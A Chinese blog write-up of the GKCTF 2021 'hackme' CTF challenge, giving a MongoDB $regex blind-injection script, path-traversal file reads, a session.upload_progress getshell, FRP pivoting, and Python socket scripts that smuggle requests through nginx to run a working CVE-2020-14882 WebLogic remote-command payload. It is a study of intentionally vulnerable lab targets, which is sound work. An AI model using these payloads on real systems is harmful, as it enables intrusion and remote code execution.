2021GKCTF-hackme

最新推荐文章于 2024-03-28 09:40:37 发布
最新推荐文章于 2024-03-28 09:40:37 发布
阅读量691 收藏 1
点赞数
分类专栏: CTF训练日记 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/125759243
版权

文章目录

前言

这一个题独立出来,是因为我觉得可以学到很多东西。

废话不多说,直接开始写wp

知识链接

总结下本篇文章的知识链接

  1. mongo注入

(https://xz.aliyun.com/t/9908#toc-6

  1. session的文件包含和反序列化

浅谈 SESSION_UPLOAD_PROGRESS 的利用

LFI 绕过 Session 包含限制 Getshell

利用session.upload_progress进行文件包含和反序列化渗透

关于session反序列化的(格外的知识,顺便看看)

  1. Frp的代理进行内网渗透

https://www.secpulse.com/archives/146653.html

  1. Weblogic console未授权远程命令执行(看懂原理)

https://chaserw.github.io/2021/09/30/Weblogic-console%E6%9C%AA%E6%8E%88%E6%9D%83%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%88CVE-2020-14882-CVE-2020-14883%EF%BC%89%E5%A4%8D%E7%8E%B0/

  1. http走私攻击打nginx反代

https://v0w.top/2020/12/20/HTTPsmuggling/#TL-DR

  1. nginx反代

https://xz.aliyun.com/t/4644

  1. 利用分块传输吊打所有WAF

https://v0w.top/2020/12/20/HTTPsmuggling/#0x05-nginx%E4%B8%A4%E4%B8%AA%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E6%BC%8F%E6%B4%9E

非预期解

考点

  1. mongo注入(https://xz.aliyun.com/t/9908#toc-6)
  2. 任意文件读取内容
  3. 利用session来getshell
  4. FRP来代理出内网的weblogic
  5. 利用weblogic进行未授权远程命令执行

wp

image-20220528152802395

看到F12的nosql,然后搜了一下,就是nosql(非关系型数据库),常见的考点就是mongo注入,当然这道题的考点也是这样的。

先来个永真式

image-20220528153340371

根据提示利用unicode字符,所以利用编码绕过

image-20220528153502459

这里应该使用nosql盲注

{"msg":"登录了,但没完全登录"}为真

{"msg":"登录失败"}为假

直接上脚本,这个脚本也比较独特,适合mongo盲注的脚本

import requests
import string

password = ''
url = 'http://node4.buuoj.cn:26641/login.php'

# 盲注当知道了用户名后就可以用正则$regex来爆破密码
while True:
    for c in string.printable:
        if c not in ['*', '+', '.', '?', '|', '#', '&', '$']:

            # When the method is GET
            get_payload = '?username=admin&password[$regex]=^%s' % (password + c)
            # When the method is POST
            post_payload = {
                "username": "admin",
                "password[$regex]": '^' + password + c
            }
            # When the method is POST with JSON
            json_payload = """{"username":"admin", "password":{"\\u0024\\u0072\\u0065\\u0067\\u0065\\u0078":"^%s"}}""" % (
                        password + c)
            headers = {'Content-Type': 'application/json'}
            r = requests.post(url=url, headers=headers, data=json_payload)  # 简单发送 json

            # r = requests.post(url=url, data=post_payload)
            if '但没完全登录' in r.content.decode():
                password += c
                print(password)

登录进来是admin.php

就是任意读取文件的阶段了

先读取info.php,就是phpinfo里面的东西

目录穿越读取/etc/passwd

image-20220528154127253

看提示是注意服务器,现在web服务器是nginx,所以读取配置文件

../../../../../usr/local/nginx/conf/nginx.conf

读/proc/self/environ得到当前目录/usr/local/nginx/html

image-20220528154434631

所以我们需要打内网的weblogic服务

没有SSRF,如何打内网呢?

我们首先需要getshell

image-20220528154704383

session的几个参数都开了,下面就是利用session.upload_progress来getshell

因为参数开了,加上file又存在文件包含,读取文件的洞,所以可以实现

可以看看这几个链接:

浅谈 SESSION_UPLOAD_PROGRESS 的利用

LFI 绕过 Session 包含限制 Getshell

利用session.upload_progress进行文件包含和反序列化渗透

关于session反序列化的(格外的知识,顺便看看)

因为这儿我再buu复现时,没有找到session保存路径(原题是有的),所以这下面的基本没有成功

这个是原题的phpinfo

image-20220528155559958

burpsuite 双开,成功写入(边写入,边包含)

image-20220528155607967

连接蚁剑后,开始内网

内网可以直接访问weblogic服务,可以使用反向代理代理出来

image-20220528155630266

利用FRP代理出来,来进行内网穿透

参考文章:https://www.secpulse.com/archives/146653.html

配置的内网在上面文章也提到了

访问,代理成功,可以直接访问内网的weblogic

image-20220528155833139

weblogic版本为12.2.1.4.0

直接利用Weblogic console未授权远程命令执行

https://chaserw.github.io/2021/09/30/Weblogic-console%E6%9C%AA%E6%8E%88%E6%9D%83%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%88CVE-2020-14882-CVE-2020-14883%EF%BC%89%E5%A4%8D%E7%8E%B0/

工具:https://github.com/GGyao/CVE-2020-14882_ALL

就可以成功打到flag了。

预期解

考点

http走私攻击

https://v0w.top/2020/12/20/HTTPsmuggling/#TL-DR

wp

只是打内网的部分不太一样

这儿是用的nginx的http走私攻击去打内网

在nginx1.17.7之前版本中的error_page 存在走私漏洞

nginx配置文件/usr/local/nginx/conf/nginx.conf,这里有个小细节是访问404的路由会自动跳转到404.php,符合error_page走私

image-20220528160522867

nginx配置是有nginx反代。http走私只能访问同一个端口的web服务,可以用来打nginx反代

http {
    include       mime.types;
    default_type  application/octet-stream;
 
    sendfile        on;
    #tcp_nopush     on;
 
    #keepalive_timeout  0;
    keepalive_timeout  65;
 
    server {
        listen       80;
        error_page 404 404.php;
        root /usr/local/nginx/html;
        index index.htm index.html index.php;
        location ~ \.php$ {
           root           /usr/local/nginx/html;
           fastcgi_pass   127.0.0.1:9000;
           fastcgi_index  index.php;
           fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
           include        fastcgi_params;
        }
 
    }
 
resolver 127.0.0.11 valid=0s ipv6=off;
resolver_timeout 10s;
 
    # weblogic
    server {
        listen       80;
        server_name  weblogic;
        location / {
            proxy_set_header Host $host;
            set $backend weblogic;
            proxy_pass http://$backend:7001;
        }
    }
}

burp构造数据包,走私到 WebLogic Console 的登录页面

GET /undefined HTTP/1.1
Host: node4.buuoj.cn:28946
Content-Length: 0
Transfer-Encoding: chunked

GET /console/login/LoginForm.jsp HTTP/1.1
Host: weblogic

burp不好操作,利用socket发

import socket

sSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sSocket.connect(("node4.buuoj.cn", 28839))
payload = b'GET /a HTTP/1.1\r\nHost: node3.buuoj.cn\r\nContent-Length: 66\r\n\r\nGET /console/login/LoginForm.jsp HTTP/1.1\r\nHost: weblogic\r\n\r\n'
sSocket.send(payload)
sSocket.settimeout(2)
response = sSocket.recv(2147483647)
while len(response) > 0:
    print(response.decode())
    try:
        response = sSocket.recv(2147483647)
    except:
        break
sSocket.close()

得到weblogic版本为12.2.1.4.0,这个版本正好在 CVE-2020-14882 的范围内,使用CVE-2020-14882,%252e%252e绕过登录直接打

import socket

sSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sSocket.connect(("node4.buuoj.cn", 25369))
payload = b'HEAD / HTTP/1.1\r\nHost: node4.buuoj.cn\r\n\r\nGET /console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%20=%20(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork();%20java.lang.reflect.Field%20field%20=%20adapter.getClass().getDeclaredField(%22connectionHandler%22);field.setAccessible(true);Object%20obj%20=%20field.get(adapter);weblogic.servlet.internal.ServletRequestImpl%20req%20=%20(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(%22getServletRequest%22).invoke(obj);%20String%20cmd%20=%20req.getHeader(%22cmd%22);String[]%20cmds%20=%20System.getProperty(%22os.name%22).toLowerCase().contains(%22window%22)%20?%20new%20String[]{%22cmd.exe%22,%20%22/c%22,%20cmd}%20:%20new%20String[]{%22/bin/sh%22,%20%22-c%22,%20cmd};if(cmd%20!=%20null%20){%20String%20result%20=%20new%20java.util.Scanner(new%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(%22\\\\A%22).next();%20weblogic.servlet.internal.ServletResponseImpl%20res%20=%20(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(%22getResponse%22).invoke(req);res.getServletOutputStream().writeStream(new%20weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}%20currentThread.interrupt(); HTTP/1.1\r\nHost:weblogic\r\ncmd: /readflag\r\n\r\n'
#payload = b'GET /a HTTP/1.1\r\nHost: node3.buuoj.cn\r\nContent-Length: 66\r\n\r\nGET /console/login/LoginForm.jsp HTTP/1.1\r\nHost: weblogic\r\n\r\n'
sSocket.send(payload)
sSocket.settimeout(2)
response = sSocket.recv(2147483647)
while len(response) > 0:
    print(response.decode())
    try:
        response = sSocket.recv(2147483647)
    except:
        break
sSocket.close()

就可以拿到flag

参考文章

http://w4nder.top/index.php/2021/06/28/gkctf2021/#post-images-15

https://laotun.top/2021/09/27/gkctf2021-web%E5%A4%8D%E7%8E%B0/

Z3eyOnd
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
[GKCTF 2021]hackme
cjdgg的博客
11-21 2283
[GKCTF 2021]hackme 进入题目后,题目如上所示,查看页面源代码 提示nosql,这里推荐WHOAMI大佬的文章 这里源代码我们也看到了php头,那我们就看大佬文章里php中的nosql注入部分就行 这里数据包是json格式,我们试一下重言式注入 被过滤了,提示也说了,可以用Unicode绕过 成功绕过,这里放的是ne,意思为不等于,可以再试试eq,我把用户名的换成了eq,可以看到这个报错,应该是用户名对了,密码不对(ne和eq前面要有$符号的,csdn不知道为啥写不出来) 既然如此
攻防世界hackme做法(简洁明了)
最新发布
2303_80796023的博客
03-28 976
一看就很有东西,那就逐一分析喽,并在旁边写上注释,总的分析不难,有一些细节点注意一下就好了,关键在于if(v21!=(v24^v20)),这边两个已知,v21和v24,那么未知的v20就是flag了呗,往上找代码对v21和v24的处理就行了,这里的v10有着0-21的可能,因为是对22取模,v21有数组对他赋值,进入提取出来就行了,v10对v19进行了赋值,v23在用之前会被归0,然后进入while,对v24操作,得到v24,这边v18没用,是烟雾弹,大概就这样分析,最后上代码。
gkctf2021hackme
weixin_44805159的博客
10-10 494
title: gkctf2021hackme typora-copy-images-to: gkctf2021hackme date: 2021-10-10 00:02:59 tags: [渗透测试, ctf, weblogic, 内网穿透] 进入题目,出现的是一个登录框:查看源码后提 示:怀疑是Nosql注入,尝试登录,查看数据包是json传输:burp抓包,构造永真式登录: {"username":{"$ne":1},"password": {"$ne":1}} 发现被检测了,根据提示一:使用uni.
[GKCTF 2021]RRRRsa
qq_52193383的博客
09-15 1391
昨天+今天都在了解和学习Rho算法以及题目羊城杯2021的easy_rsa。Rho算法算是看懂了点,可是用起来好像时间花销好大还解不出来(不知道是不是数据的问题,我用的模数是网站上无法分解的)。最最最最痛苦的是easy_rsa魔改rho后却能很快得分解出p,q,可我用Rho算法求解却解不出来(自己编的,代码附上),而且我还不知道为什么它这么一改就可以算出来。 def f(x,c,n): return (pow(x,2,n) + c)%n def Rho(n): while True:
【Hackme CTF】Web--LFI
VZZmieshenquan的博客
04-21 1485
Description: What this admin’s password? That is not important at all, just get the flag. Tips: LFI, php://filter Solution: 其实见到LFI已经可以本能地知道这是考察本地包含了,查看源代码发现参数是page要读取pages/啥啥,直接用php://filter绕过读取本...
GKCTF2020.zip
07-20
GKCTF2020 逆向 pwn等赛题,除web题外均有
CTF—WEB基础篇
Innocence_0的博客
03-15 1649
简介JavaScript 是互联网上最流行的脚本语言,这门语言可用于 HTML 和 web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备。作用JavaScript 是脚本语言JavaScript 是一种轻量级的编程语言。JavaScript 是可插入 HTML 页面的编程代码。JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。JavaScript 很容易学习。
【靶机渗透】HACKME: 1
weixin_47443077的博客
06-20 245
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 文章目录【靶机渗透】HACKME: 10x01靶机介绍1. 详情2. 描述0x02环境搭建1. 下载靶机2. 创建靶机3. 开启靶机0x03靶机渗透1. 主机发现2. 端口扫描3. 服务扫描4. web信息收集0x04漏洞利用1.SQL注入2.文件上传3.反弹shell4.提权 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1
hackme的web部分水题writeup集合
cggwz的信息飞船
10-31 407
简单介绍,hackme是提供ctf基础题的一个很好的网站,网站链接如下: 网站链接 这次把web部分的头几个没什么值得说的题说一下,因为太短了,单独发一篇博客不值得。 hide and seek 几乎每个平台都有这道题,直接右击查看源代码即可看到flag。目的就是教会我们查看网页源代码。应平台要求,flag就不提供了。 scoreboard 网页源代码里是没有的,也没有很多的提示,那么只能说flag在服务器端或者在数据包里,起码不在客户端。scoreboard页面可以和服务器端沟通的只有登录按钮和提交fla
CTF训练
syh_486_007的专栏
09-03 4188
在线CTF练习平台 发表于 2015 年 3 月 7 日 由 YouMeng 在线的ctf,教学,训练,不关闭。国外 we challenge——–最经典 http://www.wechall.net/西普学院 http://www.simplexue.com/ 有在线视频教程http://ctf.idf.cn/ IDF实验室 CTF训练营 有ctf资料,工具,知识一个在线的ctf
GKCTF2021-web-easycms
zji
06-27 1402
GKCTF2021-web-easycms 文章目录GKCTF2021-web-easycms一、解法1二、解法2 一、解法1 方法:任意文件下载 目录扫描 /admin.php 官方提示了,后台密码为5位数字的, 后台 demo/demo登录或者admin/12345登录。 点击:设计->导出主题->保存 随便填写保持后弹出 复制下载链接 http://a7242e8c-7eae-4593-93b8-5905a22305f8.node3.buuoj.cn/admin.php
GKCTF2021 X DASCTF应急挑战杯WP
mumuzi的博客
06-27 2568
签到 导出HTTP 在shell18发现cat flag并且base64 Tmpshell19就是flag 并且转ascii之后base64解码是每行翻转的base。写个脚本 num = 0x64306c455357644251306c6e51554e4a5a3046355355737764306c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4
GKCTF2021部分wp
re1wn
07-02 2025
GKCTF2021 部分wp
GKCTF2021 部分复现
Je3Z的博客
06-28 837
misc 0.03 用VeraCrypt加载输入密码 311223313313112122312312313311 所以我们需要真正的密码 所以说 311223313313112122312312313311应该是有意义的部分 通过扫描NTFS得到了secre.txt存在数据流 用AlternateStreamView导出 想个密码表 而且题目里多次提到3所以考虑将那堆数据按3位一组进行拆分 311 223 313 313 112 122 312 312 313 311 所有其有两种情况 得出的密码
CTF-hackme-Misc-slow-解题记录
逐鹿
10-24 416
题目: nc hackme.inndy.tw 7708 OMG, It's slow. 解题步骤 本题采用的是时序攻击,第一次见这种题目,也是参靠了别人的代码做出来的 具体原理就是用你输入的flag和数据库中的从第一位开始比对,比对到错误的那一位直接退出。 假设每比对一位的耗时是1s,正确的flag前五位一定是FLAG{ 当输入FLAG{_}时,如果耗时6s,说明第六位_是错的,因为比对到_就退出了,如果耗时7s,则说明_是对的,因为比对到第7位}才退出 利用这种原理,可以一位位的破解出flag 此题及
XCTF-攻防世界CTF平台-Reverse逆向类——31、hackme
Onlyone_1314的博客
08-27 654
先用ExeinfoPE查壳查看文件信息: 是Linux ELF 64位文件,没有加壳 然后用IDA64打开文件,打开字符串窗口: 可以看到“Give me the password:”、“Congras\n”、“Oh no!\n”字符串,可能是程序输出的字符串,双击 “Give me the password:”找到它在数据段中存储的位置: 选中aGiveMeThePassw按X快捷键,找到使用该变量的地方: 跳转到函数中使用aGiveMeThePassw变量的地方: 尝试按F5反编译代码: 我
[GKCTF2021]babycat
Y4tacker的博客
07-18 1205
文章目录写在前面babycat 写在前面 是Java没错了,冲它 babycat 发现接口直接post发包注册一个号登录进去 此时我们可以看见不管怎样role都是guest,后台只有管理员有上传权限 我们需要关注如何成为admin,但是文件下载那里可以目录穿越首先读取web.xml <web-app> <servlet> <servlet-name>register</servlet-name> <servlet-class&gt
buuctf [gkctf 2021]rrrrsa
04-28
buuctf [gkctf 2021]rrrrsa 是一道密码学题目,需要解密一个 RSA 加密的...总之,buuctf [gkctf 2021]rrrrsa 是一道考察 RSA 解密的密码学题目,需要掌握 RSA 加密解密的基础知识以及使用 Python 解密 RSA 密文的方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值